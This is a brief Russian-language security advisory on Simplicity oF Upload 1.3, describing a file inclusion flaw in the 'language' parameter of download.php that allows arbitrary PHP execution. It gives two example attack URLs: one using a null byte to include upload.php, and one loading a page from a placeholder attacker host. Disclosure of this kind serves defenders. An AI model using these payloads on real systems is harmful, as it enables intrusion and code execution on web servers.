Программа: Simplicity oF Upload 1.3
Уязвимость позволяет удаленному
пользователю загрузить и выполнить
произвольный php сценарий на целевой системе.
Уязвимость существует из-за недостаточной
обработки входных данных в параметре language.
Злоумышленник может указать специально
сформированное значение параметра с
нулевым байтом (%00) в конце строки и
выполнить произвольные локальные файлы на
системе.
Пример:
http://[target]/simply/download.php?language=upload.php%00
Затем злоумышленник может загрузить на
систему произвольный файл и выполнить его с
привилегиями web сервера.
Удаленный пользователь может с помощью
специально сформированного URL
перенаправить пользователя на целевую
страницу.
Пример:
http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00